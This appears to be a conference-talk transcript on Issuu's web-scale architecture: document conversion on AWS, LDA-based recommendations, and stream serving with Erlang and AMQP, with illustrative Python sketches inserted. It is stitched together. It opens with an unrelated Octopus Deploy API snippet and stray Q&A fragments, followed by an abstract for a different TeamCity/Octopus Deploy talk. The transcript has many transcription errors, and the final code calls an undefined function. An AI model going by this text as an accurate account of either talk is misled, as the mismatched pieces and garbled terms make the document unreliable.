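To make the earlier point about using the API a little more concrete (checking which version is already deployed before creating a new release), here is a rough sketch in Python. The server URL, API key, project and environment IDs are placeholders, and the endpoint path and response field names are assumptions about the general shape of the Octopus Deploy REST API rather than verified calls, so treat it as an outline of the approach rather than working integration code:

    # Sketch: skip the deployment if the candidate version is already out there.
    # OCTOPUS_URL and API_KEY are placeholders; the /api/dashboard shape is assumed.
    import requests

    OCTOPUS_URL = "https://octopus.example.com"   # placeholder
    API_KEY = "API-XXXXXXXX"                      # placeholder
    HEADERS = {"X-Octopus-ApiKey": API_KEY}

    def deployed_version(project_id, environment_id):
        # The dashboard resource lists the latest release per project/environment.
        dash = requests.get(f"{OCTOPUS_URL}/api/dashboard", headers=HEADERS).json()
        for item in dash.get("Items", []):
            if item["ProjectId"] == project_id and item["EnvironmentId"] == environment_id:
                return item["ReleaseVersion"]
        return None

    def deploy_if_new(project_id, environment_id, candidate_version):
        current = deployed_version(project_id, environment_id)
        if current == candidate_version:
            print(f"{candidate_version} is already deployed; skipping.")
            return
        # Creating the release and deployment is left to your build automation
        # (octo.exe, the REST API, or a TeamCity build step).
        print(f"Deploying {candidate_version} (currently {current}).")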
Are we good? Yeah? All right. Anybody else? Oh, yes. Sorry. It's bright. Yes? Okay.
|
One of the main tenets of Agile development is to deliver business value to the production environment early and often. That's easy enough if you are delivering one small web app, but what if your application is composed of several web apps across multiple tiers with a large database and maybe even a few Windows services and scheduled tasks? Now you need a deployment system that is built to scale and allows you to automate all of these tasks to achieve consistency in your deployments. In this talk I will show you how to deploy a complex application to multiple environments with just the click of a button using TeamCity and Octopus Deploy.
|
10.5446/51436 (DOI)
|
Okay, but welcome to this presentation. So what we want to talk about today is stuff we work on at this company called Issue. My name is Jesper, this is my colleague Martin. I just wanted to ask if any of you have ever heard about Issue before? No? Okay, it's kind of a small crowd, so perhaps that's not so representative. But anyway, we want to show you about our company issue and what we do, and it will be a lot about the practical examples of how we run things at web scale. We have a lot of traffic on our website, and we just really want to show you what technology worked for us, what didn't work. So it's a lot of practical examples of those things. Great. But actually, let me just show you what Issue is to put it all into context. So somebody that did know what Issue was was this conference, because they actually uploaded this publication to our website. So Issue is a website where you can upload printed publications and then have this nice reading experience. And then you can take this thing and embed as a widget on your own website so that you can kind of have an easy way to distribute printed stuff on your own website. How you can use this reader, and then if you scroll down below, you can see kind of related documents. And what we're going to talk about today is all this technology that lies behind this, how we serve up to all those users and how we create relevant. So Issue is kind of a technology platform where publishers will have some printed publications that they want to upload, so they will do that, and they usually have a need for it, like embedding it on a webpage. But what we then do is that we keep that document on our website and make it available to people that just visit us. So just as on YouTube where you can go and find cool videos, then you can go to Issue to actually find cool publications, because we have all these publications that people uploaded to us because they needed to use it as a tool. That means it becomes kind of an ecosystem where publishers upload content, readers kind of read it, then somebody can curate that and create nice stacks of interesting content that they can share with their friends. And we have some tools for market seers that can get more readers, and more readers means that more publishers want to upload stuff to us. So that's kind of the circle that we get more and more publications. So just to give you some numbers here, at this point in time we have around 12 million publications. We're getting approximately 25,000 new publications per day, 7 million written-statusers. In this talk we're also going to talk about how we track user behavior. So those statistics we get about 15 billion statistic events per month and 4 billion of those are impressions. We have 7 million unique visitors to the website, which actually makes us just outside the top 100 websites in the US. It's pretty cool. Average visitors use 7 minutes on the site. And actually last, recently we just released a version for the iPad and tapped it, and that kind of increased the reading time significantly. So it seems like what people want to do is to sit in the bathroom and read publications or relax in a sofa setting. Great. So what is the agenda for today? As I said, we have a lot of technology. We could have talked about lots of things, but we handpicked some things that we believe could be interesting to see examples of. 
So we'll talk about the upload process, how we convert stuff, what architecture goes into that, how we use some machine learning to make recommendations for when you're reading stuff, what could also be relevant for you, how we scale the whole delivery of content to clients, and then at last the consumption tracking. Great. So let's stop with the publication upload. So you're a publisher, you have a PDF file, you upload it to us. It goes into this magic bubble that is essentially just a huge tool chain of all kinds of weird open source tools and in-house tools. We found like PDF2xml, LibreOffice, and so on. That does all kinds of things, and then essentially makes it available in the reader. So there are around 24 pages on average, and the processing time in that tool chain is then one to one and a half minutes on average. Sometimes people will upload insanely huge PDF files, and also the PDF format is really not that well defined. You can have all sorts of weird tools that will create weird PDFs that will break the tools and so on, but more about that later. So how does the infrastructure look? So this is a drawing. So first of all, we're using Amazon Web Services on a huge scale. I think right now we have around 300 instances running. So Amazon is quite happy to have us as a customer. So the infrastructure here is that a client sits in his web browser and wants to publish a document, and he then hits the elastic load balancer. This is an Amazon thing that essentially just does round robin to hit these converter instances. We'll dive into how that looks later. The point is on these converters, the client uploads the document, and one pattern we've started with was to upload the document to the Amazon storage called S3, but we found that that was actually too slow. So what we do instead is that we upload straight to the local file system of this converter process, and then once that is done, a background task actually puts it into storage. So that huge tool chain that is running here, as I said, it can break because we're not really in control of all those tools. That's just how it is when you're using a lot of tools you're not in control of. So we kind of expect this to fail often. So therefore we have this monitor thing that kind of have a look and monitors and see if this stuff breaks, and then it will retry and put it on to another server. We're using AMQP technology to send messages. Martin will talk a bit later about the architecture of that. Yes. Another thing, right now I think we have around 100 of these converter instances, but the monitor will actually also have a look at the load. So each hour it will kind of very flexible with Amazon Web Service technology to turn the knob up and down in regard to how many servers we actually have. Another thing we found was that using Amazon's AMI to boot the servers was actually very, very slow. So what we now do is we boot them from EPS. That's just trial and error that we found that worked really well for us. We can boot them quite flexible to kind of handle the load in a dynamic way. But if we dive in through how this converter thing actually looks, ah, yeah, great. Yeah, so we're trying to keep around 30% spare capacity. And the monitor here is created in Python. Python is a language we use a lot to kind of glue stuff together. We found that it works well for us. Great. So the architecture of the individual converter is kind of the same thing where we have this monitor thing, but now it just monitors the individual converter processes. 
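As a rough illustration of the "write to local disk first, ship to S3 in the background" pattern just described (not Issuu's actual code; the bucket name and helper function are made up), a minimal Python sketch using boto3 could look like this:

    # The converter starts work on the local copy immediately, while a background
    # thread pushes the original to durable storage so a crashed host can be
    # retried from S3 later by the monitor.
    import threading
    import boto3

    s3 = boto3.client("s3")

    def handle_upload(local_path, doc_id):
        start_conversion(local_path, doc_id)
        t = threading.Thread(
            target=s3.upload_file,
            args=(local_path, "example-original-documents", f"originals/{doc_id}.pdf"),
        )
        t.daemon = True
        t.start()

    def start_conversion(local_path, doc_id):
        # Placeholder for handing the PDF to the conversion tool chain.
        pass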
So this, that huge tool chain will try to spawn as many of them in parallel as possible. But then you also run into stuff like some of the tools really don't work that well in parallel. If you spawn two versions of LibreOffice, it will share the same temp files and weird things will happen. But we try to fire up as many as possible and the monitor will then keep track and see if things need to be restarted. The client hits NGNX at the top because that's an SSL termination point, so they can upload over HTTPS. The tornado then transfers the HTTP request into Python and puts it on a task queue. And then all the results of the conversion tools ends up on a local file system and eventually on S3. Yeah, as I said, you're not really in control when you just have a huge tool chain of tools you have picked. Great. So what comes out of the conversion process? So first of all, we extract the actual text file from the PDF. We can use that in the search infrastructure. Martin will talk a bit about that. We need the page sizes and PDF metadata. Document type is something we made ourselves. We are seeing if we can do something about finding explicit documents. I mean, people will upload all kinds of weird things and they are not that nice about saying that it is explicit. So we try to detect that ourselves. But eventually per page we will end up having some Swift file because the reader you saw before is written in Flash right now. We actually do want to experiment with HTML5, but for now it's Flash because that gives the best kind of reading experience with nice animations and so on. And we'll have some fun things for the website. So as I said, we have around 12 million documents and that makes up for around 250 terabyte worth of storage right now. So that's another reason why Amazon is happy fast because we have paid them a lot of money for storage. Great. So that was what I wanted to say about upload. Actually if you have any questions along the way, I mean, this is a small crowd so you can do more than have it and just shoot and we'll take them. Any questions for the upload thing? Yes? If you're uploading direct to the converters, do you have a much dropout of those? If you lose instances? Sell them. Yeah. People are just happy to retry the uploads. If it should happen. So there are two reasons why an upload could fail. One reason is that you should be crashing the structure because your PDF is sick or, I mean, malformed or something, password protected. That's the most common case for failure and we seldom see that instances just crash. I mean, that happens, of course. And if that happens then and you haven't uploaded the upload of the PDF itself is not finished and we've lost them, you have to restart. And once the PDF is there, then we have it in local storage, we've shipped it off to something durable as three and then we can restart on another host. So another point is that the client actually keeps a connection to the host at all times which means that it can show a progress bar of how far in the conversion process it is. So we actually have a special version of that reader that, so you can, for example, flip to page 100 before it's actually converted and then it will schedule that page to be converted before the other so that if you want to look how something specific works, you actually can do that during the conversion time because it can take several minutes to do that. So that's another reason to keep the connection. Great. 
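A minimal sketch of that converter front end, assuming Tornado behind nginx and an in-process queue standing in for the real tool-chain dispatch (handler path, field names and port are illustrative, not Issuu's actual code):

    # nginx terminates SSL in front; Tornado accepts the upload, writes it to the
    # local file system and enqueues a conversion task for the worker processes.
    import os
    import queue
    import uuid
    import tornado.ioloop
    import tornado.web

    conversion_tasks = queue.Queue()

    class UploadHandler(tornado.web.RequestHandler):
        def post(self):
            upload = self.request.files["document"][0]   # multipart field name assumed
            doc_id = uuid.uuid4().hex
            local_path = os.path.join("/tmp/uploads", doc_id + ".pdf")
            with open(local_path, "wb") as f:
                f.write(upload["body"])
            conversion_tasks.put((doc_id, local_path))   # picked up by converter workers
            self.write({"documentId": doc_id})

    app = tornado.web.Application([(r"/upload", UploadHandler)])

    if __name__ == "__main__":
        os.makedirs("/tmp/uploads", exist_ok=True)
        app.listen(8080)
        tornado.ioloop.IOLoop.current().start()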
So let's talk a little bit about machine learning for finding recommendations. So I showed you before when you're reading a document, it can show you other things that might be interesting for you and since we have this ecosystem, so we want to cater for the publishers, give them a nice upload and tool thing, but we also want to cater for the readers and give them a great experience where they simply find that Issuu is a fun place to be, to find cool content. So how do we actually do that? Take in some publication, do some magic and then make recommendations. So one thing is we can ask the uploaders to actually put some tags and descriptions and that. So first of all, it will be quite bad what they write or it will be plain wrong because they'll just write foobar, foobar, foobar because they are lazy or they don't want to do it. So our experience is really that you cannot rely at all on user-made things. People just want to drag and drop the thing, see the upload complete and then move on. So we want to actually employ machine learning. So what would a human do when you're reading a magazine like this? You'll take a look and think what is it related to, what does it feel like, what does it mean? So we want to try to build kind of a mechanical brain and the approach we took was to build what's called a topic model. So that's actually some roughly 10-year-old technology called latent Dirichlet allocation. Dirichlet, that's a French guy. Actually, it's open source and available on the web. You can go try it out. This was just the route we took to try to build this mechanical brain. So we need to build this topic model. I'm going to explain kind of in a few very high-level steps how this works to just give you an idea about what goes on behind the scenes. So what we did was we took Wikipedia because that's actually a large, publicly available text corpus that had information about a lot of things. And what we want to do is the topic model needs to find relationships between topics. So on Wikipedia you have around 100,000 words you can get out of that, and you have a lot of articles that you can then use the algorithms on to kind of find the relationship between those words and those articles. So the first thing you need to do is to get a sanitized word list. And on that LDA website I showed you before, there are tools that can actually do this. You give it some text and it will give you a word list. So out of Wikipedia we got 100,000 words. English words. It was the English Wikipedia we used. And then we inspected it a bit and actually found that 15,000 of them were not English. And that's really bad because then later on in the process, if you have something in Spanish about cars and something in Spanish about travel, then that will be the same because it's in Spanish. But that's not really relevant, right? That's not related. So we took out all the non-English words. Here are a lot of Russian examples. And the same thing goes for names. That really doesn't fit in this model. So the first step is get a word list. The next step is then that you run this huge magic thing that is the LDA algorithm and it kind of looks at all the individual articles on Wikipedia. The good thing is that each article is kind of about the same subject, kind of about the same topic. So the output is really just this huge list of weighted words, how they relate to each other in the articles. I know this is a bit confusing, but just consider that this is what you get out of the algorithm.
One thing you do provide is that you tell it how many topics you want and we just chose a number. And I mean, there's a lot of trial and error in this. So I think we tried to do 100 and 200 and ended up using 150 topics. And this is kind of what a topic looks like. It's just a weighted list of words. And if you then inspect documents that kind of fit into this, and this is done by manual inspection, you can see, okay, documents that fit this will be about racing. So this is a bit abstract. Let's try to look at this drawing. Okay. Just one more example. This is an example of some of the topics and we just named them. You don't really need to know the names, but just as examples about what that algorithm found. It's also important to know that, I mean, we used Wikipedia as the input, but if you use something else, this will be entirely different. So it's a very kind of organic mechanism. There's no single right answer or any one way to do it. It stands for latent Dirichlet allocation. Dirichlet, that's a name. It's the statistical model for finding topics given the corpus of text. Yeah. So I think this slide kind of shows it a bit more intuitively. So yeah, that's why you do that by manual inspection. It turned out after we run this algorithm, it produces 150 topics and then we look at the words which went into the Germany one and it contained words like Berlin and Volkswagen and other things that might be connected to Germany somehow. So it's just an artifact of the process. It chooses these things. It says these things go together. We can inspect what these things are and then we can attach a name. All this must be stuff that has something to do with Germany. Yeah. There's another Germany too somewhere. And the point is you don't really need, you don't really use those names for anything. It's just to kind of get an idea about what kind of topics did you get from that text corpus you used. I mean if we had used something else than Wikipedia we would have gotten some other ones. This drawing shows it a little bit more intuitively. So you get a document, a PDF file in and then you translate the text to English because we used the English text. So there comes another problem. How do I translate fast enough to handle 25,000 documents per day and so on and so on. That's a whole other story. But assuming you get some English text from the PDF you can then run this model and then what it does is it kind of looks, oh, whoa, that's a stage. It looks into all the words in the documents and just counts them and kind of on all those 150 different topics it kind of sees how relevant they are. So you kind of get this DNA fingerprint that says, okay, this document has this fingerprint distribution. You can say that in an intuitively high level fashion. Yes, that is correct. So what you then do when you have a publication that has this fingerprint is that you can actually essentially the 150 topics is like a 150 dimensional space. Once you have stuff in the space they will have a position in that space. So just to recap, we built the topic model using the Wikipedia text and then we ran this on all our documents so all the documents got this fingerprint which is essentially then a place in this huge 150 dimensional space. It was just shown here as a 2D thing for illustration purposes. And the point is once you have them in the space then you can actually calculate distance, right?
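Purely to illustrate the idea of building a topic model and turning a document into a topic "fingerprint", here is a sketch using the gensim library. That library choice is an assumption made for brevity; the talk refers to the original LDA tooling, not gensim:

    # Illustrative only: train a 150-topic model on a tokenized corpus and compute
    # a dense per-document topic distribution (the "fingerprint").
    from gensim import corpora, models

    def build_topic_model(tokenized_articles, num_topics=150):
        dictionary = corpora.Dictionary(tokenized_articles)
        # Sanitize the word list: drop very rare and very common tokens
        # (the talk additionally removes non-English words and names).
        dictionary.filter_extremes(no_below=20, no_above=0.5)
        corpus = [dictionary.doc2bow(tokens) for tokens in tokenized_articles]
        lda = models.LdaModel(corpus, id2word=dictionary, num_topics=num_topics)
        return dictionary, lda

    def fingerprint(lda, dictionary, document_tokens, num_topics=150):
        bow = dictionary.doc2bow(document_tokens)
        dense = [0.0] * num_topics
        for topic_id, weight in lda.get_document_topics(bow, minimum_probability=0.0):
            dense[topic_id] = weight
        return dense   # a point in the 150-dimensional topic space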
And distance is kind of a similarity thing because of all those topics things that have a huge thing on travel will kind of be placed in the same area in that space. Does that make sense? But the problem now is that then you have 12 million documents, right? And then each time a new document come in you need to calculate 12 million distances which is kind of computationally very heavy to do on the fly. So the next step we took was to actually cluster this space using the K-means algorithm. It's essentially just a clustering algorithm that you provided a number and say how many clusters you want then it iterates until everything kind of settle into place and you get these clusters in the space. And then you only have 3,000 cluster centers that you need to kind of when you come in with a new document you just find which one of those centers are your closest to and then you say okay you are in this segment. And then it becomes very easy to find relevant things because you just choose another document inside this segment. So then it's very fast at runtime to actually get relevant documents. The problem then is that those 3,000 I mean there was just an arbitrary number we picked out of thin air or a little bit of trial and error perhaps we had some technical requirements at the time but what we have found is that it is actually a bit cost to only have 3,000. So what we are experimenting right now is to actually switch to using 100,000 perhaps even the 200,000. But it is a bit something you just need to experiment with and see how well it works, right? Because you can't really make an algorithm that says how relevant something is. You kind of need to look at it and inspect it and kind of have a look at all the documents in one segment and see how relevant are they. But it does kind of work okay for us. Let's just show a quick example. So here we have a fashion magazine and if you scroll down at the bottom these are examples of stuff that are provided in the same segment as that. That looks pretty much fashion. Great. Any questions to this one? Then I don't know, I think. Yep. Okay. So I am going to talk a bit about how we actually deliver publications. So we have now seen that we can read a publication on issue. We can see how we can as a publisher I can upload a new application to issue. We can see that we can pull out various artifacts and now I am going to talk a bit about the architecture that goes into delivering a particular document. So this works like that. Okay. So reading a single document as seen from the reader experience as you on your browser, your client, the client first connects to www.issue.com and that's just a web server. It serves up the containing web page. No assets yet. Just a container, some JavaScript, a lot of other stuff. Then we have what we call an API server over here. Basically the client needs a whole number of APIs to populate the page and these are all exposed through this host and this could be stuff like logging on a user, getting an authentication token, querying if the user has rights to do this and that. Within my login credentials what is the metadata related to me. All these kinds of queries can be retrieved to this server and it uses a whole set of backend systems of which we use MySQL to host, to store details about users, details about the documents that we have. But there are also other places that we store stuff and retrieve stuff from depending on the user's patterns that we have. 
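Going back for a second to the clustering step described above, before the delivery part: the segmentation idea is to cluster the fingerprints once offline, then assign each new document to its nearest cluster centre so related documents can be picked from the same segment at run time. scikit-learn is assumed here purely for illustration, and the cluster count is the one mentioned in the talk:

    # Offline: cluster all document fingerprints. Online: one distance computation
    # per cluster centre instead of one per document, then recommend within the segment.
    import numpy as np
    from sklearn.cluster import KMeans

    def build_segments(fingerprints, n_segments=3000):
        # fingerprints: array of shape (num_documents, 150)
        km = KMeans(n_clusters=n_segments)
        segment_ids = km.fit_predict(np.asarray(fingerprints))
        return km, segment_ids

    def segment_for(km, fingerprint):
        return int(km.predict(np.asarray([fingerprint]))[0])

    def related_documents(doc_id, doc_segments, segment_index):
        # segment_index: dict mapping segment id -> list of document ids
        segment = doc_segments[doc_id]
        return [d for d in segment_index[segment] if d != doc_id]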
Once we've talked up here the client can then connect to what we call the stream servers and as you saw in the reader before it had a reader experience where you could flip pages and below that it had the set of related documents. That's basically a conceptually infinite stream of documents which are related or we have other kinds of streams. I'll show you some in a while. But these stream servers are responsible for serving up that part. Then there's all the heavy lifting of delivering all the assets to the client, delivering the swift files with the flash player, delivering all the images in various resolutions, delivering all kinds of stuff. That basically goes on to S3 which is Amazon's very durable storage solution. It's fairly slow in terms of individual bandwidth. It takes a while to use HTTP so it takes a while to create a connection and get the content and download it. But it scales really, really well. So you can have an enormous amount of clients that read from S3 simultaneously and also S3 integrates very well with content delivery networks. We use CD networks as our content delivery network such that it's a very convenient process for us to basically just upload stuff to S3 and then point the CD to Amazon and it'll transparently to us be distributed to a server near you. So I'm going to now zoom in on various bits here. So let's start with the web server. Sorry, yes? I'll get to that. She asked about, well, one of the things that happened during the upload was that documents are categorized into clusters or segments as we talked about. I'm going to show you how we use that in a while. I was talking about security, how if I know the URLs that you speak, can I get a picture without having access to them? Yes. So the URLs are just security based on? Well, I mean, if you use a proxy on your local host, you can see all the URLs. So basically a URL for a thumbnail for a document cover is public. You have to be able to access it from your browser anyway. We are fine with people getting that. What do you think would be the security problem? It's publicly available information. But the license might be... You provide, when you log in, could be over some suitably encrypted connection and you get a token. So all the secret bit goes on server side. You only get an authentication token. Yeah, the S3 server will check that token. No, because everything that's over here is in the clear. So I mean, but you could have an HTTPS connection. I mean, we support HTTPS. So if you're worried about middle attacks and that kind of thing, then... No, I don't. I was just thinking that I should get access to one of the... One of the consents if I didn't have the license to see it. No, okay. But like on YouTube, the content is public and stuff. And it is possible to have private or unlisted content on issue and the access key is the URL like on Google. So the license might have more control stuff like functionality in the reader. Like if you pay for... You have a product where you can pay to remove the related stream, for example. If you have a catalog for furniture, you don't want other furniture companies below you. Then you can pay for that. And that is then functionality that the reader will use the secure API connection. Okay. So let's zoom in on the web server part. This is a very standard pattern that we use over and over again in issue to scale. We try when we do stuff to use multi-availability zones so that we can have failover. And you will see that quickly that that's a problem here. 
I'll get back to that in just a second. But clients will connect to what is a proxy server. Again, as in the content upload part, we use engine X SSL termination and also use it to serve up these static assets that have to be there always on the web server like the favicon.ico and for flash readers cross domain.xml and other little annoying static files. And once we get inside and we are just a normal HTTP on the other side, we use HA proxy as a load balancer that will then distribute load out to a number of web servers. And for serving up this part of the website, we use Node.js. Basically, we can make do with just having three servers. In Amazon, we use M1.large, which are really pretty small machines, two core machines, and we run one instance of Node.js on each of those. And that works really well for us. The problem here is that in terms of security, we only have this available in one zone. We could use the Amazon elastic load balancer, but the problem is that then you do it does it on the HTTP level. And down here, we want to do IP tables on the IP level. So if we use the elastic load balancer in front of this, we would have to do filtering based on the X forwarded for rather than directly on the IP address, which we can see down here. So a way that we are working on investigating for having several availability zones and a full failover is to do a dynamic DNS assignment so that this could be replicated over here and have the same name, but the DNS would be swapped so that we could have full failover capability. And that's something that we're working towards. So let me just go back here. The API service I'm going to zoom in on now. Yes? So we have a really strong plan on that. Well if we had something which could do dynamic DNS allocation so that when you looked up www.issue.com, it might resolve to one of the other availability zone. And that thing is one of Amazon services that would then detect if one zone was down and then only give the other one. Yeah, but it has to do with DNS, your IP. Then you would have a short problem I think. Yes, so then what I do is you can cut down on the timeout. Yes, yes, I guess that would be a way to do it. But we're not doing it yet, but we're going to do it and that's one of the issues that we'll have to look at. So API servers, these servers that fulfill all of the APIs that the clients need to populate the web pages, again, same model, proxy here that go to API servers. And these get a lot of requests which are fulfilled from various backend systems, MySQL and others. And we have chosen to implement this in Erlang. You all, have you all heard of Erlang? Yeah, okay. So Erlang is a functional programming language. I happen to love functional programming languages. I think they're pretty neat and a nice way of developing. And Erlang has this concept of you fire up a process and that then lives in a tree of supervisors such that the process has a parent which checks to see if it's alive. And if it dies, for example, if it's given bad data or there's a bug in there or something, then the parent can respawn it. And the parent can also check to see, has I have I respawned this child five times within the last 30 seconds and something is maybe seriously wrong and then I can die myself. And then the parent can have a grandparent which can then supervise. So you get these whole trees of supervised processes to handle failures gracefully and time out and all that kind of thing. 
And Erlang has proven for us to be a really flexible and scalable platform to handle this. So it is my firm belief that if you have never programmed anything in a functional programming language, then sitting down and learning to program something in a functional programming language will make you a better programmer. So it's actually sometimes difficult to get to hire new developers that know how to do functional programming. But I think they are better developers for it and it's actually a good thing for us. I think that it's difficult sometimes because I think the people that we finally do get are better for having spent time on learning this kind of stuff. Okay. I want to show you another stream. Let me see if I can make this work. No, that's death by PowerPoint but not yet. I'll tab over there. I'll try. Okay. So if you go, where is my mouse? If you go to issue.com here. And you are a, I'm now logged in here. And if I go, if I'm not, that's excellent. Okay. So when I go to issue and I'm not logged in, this is what the page that I would see. We have some banners up here for stuff that we are promoting. But basically we have a stream down here of document covers. This has content from various sources. Basically the point here is that we want, our whole goal is to create a stream of content which may or may not be relevant or interesting to you as a user. But it's our job to try to make, to serve up content for you that's as interesting as we can possibly make it. So I can scroll down here. It's a long stream. And you can see the spinner that spins. And then we can go fetch some more content. So basically from my perspective, this is an infinite stream. And we separate the fetching of content into the first fetch of a batch of covers, which we call the initial request. And then we have subsequent request, which we call continuations. And I'm going to talk more about that in just a second. So, right. So we present streams of interesting documents. And then I want to talk a bit about what interesting is. Well, if we don't know anything about a user, if it's a new user to issue, we've never seen him before, we can make some assumptions about what might be interesting for him or her. So, we know where you come from. We can look up your IP and your GUIP database. So we can maybe serve up some stuff that other people are reading near you. If you have already read stuff on issue, we set a cookie in your browser which tracks the latest whatever, 10 documents that you've read. Actually not documents, but segments that you've read. There's your segment. We'll see another use for it later. And we might choose, we have an editor that picks out documents which has been uploaded to issue that he finds interesting. So that might be something we can serve up here. We pick out certain categories. Again, this is certain segments that we've found might be art or travel or news or whatever. So we can also put content that comes from certain segments into the stream. If you're doing a search, it might also be relevancy. So if we go back to the Chrome here. Then these various covers, they come from different sources. They might be there because it's an editor's pick. It might be there because it's a document that's trending near you. It might be there because it's a news document or it's an art document or whatever. So what does this look like? And I wanted to show you, it's actually, it's a pretty complex description of a stream, right? And the client here, it's just one continuous stream of documents. 
But as we explained it, we have many different sources that go in and we're going to go out and query and then merge into a single stream. So on this next slide here, this shows all the sources that go into making this one stream. And it's not as bad as it looks. And we're not going to go into detail. I just wanted to show you some of the thinking that we've done to build this stream. And other streams that we have on the site are similarly complex. But basically, all these guys over here are different categories. This one here is learning, for example. This one's business, style and beauty, home and garden. And when we're trying to serve up a stream for you, we say for news, for example, that we want some of it to be boosted for locality, for geographic locality. News is maybe more relevant if it's local, your local news. But there might be some international news. So in news, we've split it up into something locally, which is locally boosted and something which is just globally. We have these purple guys here, our searches for documents that are in segments that you have previously read. And these are your three most read segments. So we can go out and try to find documents that live in the same segment, put those into the stream. We have the editor's picks. We have trending documents. So all the leaves in this tree, the root is up there in the corner, all the leaves represent content sources and these guys and merge content from content sources. And then we need to sometimes go out and decorate results from over here with extra mesodata so that we need to actually serve it up. And let's see. So this is just another view on a stream that I have cut out. You can see here that it's colored. So actually we have debug tools that will allow us to say, well, when we're looking at the stream and trying to find out, does it feel right? Does this stream have the right taste? Does it contain the right documents? Then you might want to ask, well, why did I see this document? Did I see this document in the stream? Because I read it recently. It was in the same segment. Is it trending? Is it an editor's pick? Then I can go into debug mode on the stream and then I'll get them color coded. And then this color code will correspond to this graph here. One final thing that we design into the system is that we can, for each content source, we can annotate it with properties such that we can automatically reason about the kind of content that we get. For example, it's important that we try to avoid serving up explicit content unless users have explicitly indicated that they would like to see explicit content. So we can then annotate this source over here and I say, I'm going to guarantee you that this source will never return an explicit document unless the user has requested us to do so. And then we can verify at tree construction time that we will in fact never return an explicit document. This has been quite useful for us, at least this is sort of a piece of mind thing that we know. Okay, we won't do this unless we really intend to. Okay. So we have actually learned that because of the large number of streams and the complexity of the streams that we have, that self-documentation of streams is important. And I can't click the link. I can click it here. Thank you, Keynote. Keynote is really being helpful here. So this is the self-documenting part of the component which revs up the streams. I can go to the server. 
We have a number of workers that serve this and this is going to tell me which worker is actually serving this request right now, what streams that it serve. They all have names. They all have version numbers. And they'll even, they can even draw themselves in a nice way so that me, just the version of the graph that I showed you was a handly outed. Did I manage to click on it? Yeah, here we go. So this is what the actual machine rendered version looks like. It's a bit wider. But this has proven, this self-documentation thing has proven to be very useful for us to try to find out what's going on in our system. Right. So how do we actually deliver these streams? Well, when we've reached and gone to this stream-based version of issue, it looked slightly different a few weeks ago if you'd gone on to issue. So we didn't really know when we were doing this redesign how many streams were we going to serve, what the load on each stream would be. And as we've just seen, one request to say the explore stream becomes many requests when we're fulfilling it on the server side. We need to go out and get all these categories. We need to get the editors picks and so on. We, one explore stream request gives rise to 27 internal requests within the issue side. So we needed to think carefully about how are we going to handle caching and then do load testing while we're developing, trying to emulate as realistic a user scenario as we possibly could before exposing this to the world. And we just, we came up with a number, we guessed and we said, okay, we're going to be able to handle more than 200 streams a second. And then what happened? Well, when we went live, this is the actual number of streams served over the last, well, few days from May 30th to the 7th of June. That's a few days ago that I took this picture. But basically, the yellow graph here shows the number of initial requests served and the green one shows the congenerational requests. So if you sum these up together, you'll see how many requests we've served in all. Looks like peak around 4,000 requests a second. Here we didn't serve any. That's probably because we crashed. And then we can see that we have a distribution of load throughout the day. So from a valley to a valley or peak to a peak represents a 24 hour period. It also shows that, well, at least by experience, we know that in the afternoon, the topmost peak, let's be one, the Americans are up and awake in reading stuff. That's a large part of the traffic. And this is in Europe. We get this peak here at lunchtime around Europe, a little valley before the Americans wake up and start accounting for more traffic than the Europeans do. So the actual usage pattern is only 4,000. These units are requests per minute. So if you do the math, you can end up at about slightly under 70 peak per second. So since we designed for 200, we were safe there. A pattern which was really useful for us here is that we use a product called carbon for monitoring for doing all these kinds of statistics performance measurements. We have lots and lots of things that we can measure. Cash performance, request per second, response times, a whole plethora of things. And I just want to show you that we can actually, this can give you lots and lots of stats. And what this really gives you is once you have a history of past behavior, you can go in and query in carbon. Might not even be, you don't have to define it up front. It just stores all kinds of statistics and you can see it on different scales. 
It has around Robin database where it first stores per minute, then per chunk of time, and then per larger chunk of time. So you can go back and query historical data. What do you call it? Carbon. Carbon. C-A-R-B-O-N. It's a graphing tracking. Is it like MRTG? I don't know that. It's very much like that. It's just like a thing on top of it or inspired by the same pattern. So we use two tracking infrastructures for statistics gathering like this. One is called cacti and the other is called carbon. Carbon is the more flexible of the two. And this is, I don't want to talk too much about this. I just want to show you that we have lots and lots of stats that we can gather and we can put them all together in a nice picture and carbon will serve them up. And we can actually see here, this is the response time for the explore streams. And this was, this is real time right now. So something happened at around midnight. And I talked to the guys back in the office. We don't really know what it was. We're digging into it. But the response time for the explore stream shouldn't be four seconds, which we would much rather sit down here around five hundred milliseconds to serve up the explore stream. We don't want our users waiting for that long. But if we wanted to look into it, then we have this tool to dig into various performance metrics. And that's been really, really useful for us, essential I would say. So what does a stream server look like? Well, up at the top, we get in, the client will connect to, we go through the API server actually. So always lying, lying a little bit before when I said that we go to access the stream server, we should actually go through the API server again. Comes in as an HTTP request. But here we use a messaging infrastructure, which is called AMQP. Also an immensely useful tool. AMQP is, can serve out messages in various ways. Here we use a work queue model, where we have a work queue that we have stream server processes running on many hosts and many available, or two availability zones, such that when I issue a request as a user, it goes on to the message bus and the first available worker, which can pick up the request and try to fulfill it. And the worker will then fulfill the request for the explore stream, say, by going out to MySQL maybe to get metadata about documents or to a trending server to find out what's trending near you. It will go to Solar, and I'll talk to you more about that to find content within a certain category, say. And then some internal APIs we expose as RPC calls again over AMQP. It's the same AMQP server. So we might go directly to the API server, which will then do stuff with its back end servers. GeoIP lookups, we will do over here. We have also an ad serving or promoted document serving. It's possible on issues to pay, issues to raise up the documents ranking, basically. So AMQP here works as our load balancing mechanism that works really well for us, the work queue model. If we find that the stream servers are not responsive enough, if we have no available workers, it's very, very easy for us just to fire up another instance, another worker, another host with more workers on it, and that will scale very rapidly. In a matter of minutes, we can increase our processing capability horizontally. Also another pattern that we use here is that since when I connect the first time to say, please give me the first documents in the stream, I will get a response back. 
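As a sketch of that "Python glue" worker pattern, here is roughly what a stateless stream worker consuming requests from a shared AMQP work queue could look like, with the substream offsets travelling back to the client so any worker can serve the next continuation. The pika client, queue names and message fields are assumptions, not Issuu's actual code:

    import json
    import pika

    connection = pika.BlockingConnection(pika.ConnectionParameters("localhost"))
    channel = connection.channel()
    channel.queue_declare(queue="stream_requests", durable=True)
    channel.basic_qos(prefetch_count=1)   # hand each worker one request at a time

    def on_request(ch, method, properties, body):
        request = json.loads(body)
        offsets = request.get("offsets", {})          # state travels with the client
        covers, new_offsets = build_stream_page(request, offsets)
        reply = json.dumps({"covers": covers, "offsets": new_offsets})
        ch.basic_publish(exchange="",
                         routing_key=properties.reply_to,
                         properties=pika.BasicProperties(
                             correlation_id=properties.correlation_id),
                         body=reply)
        ch.basic_ack(delivery_tag=method.delivery_tag)

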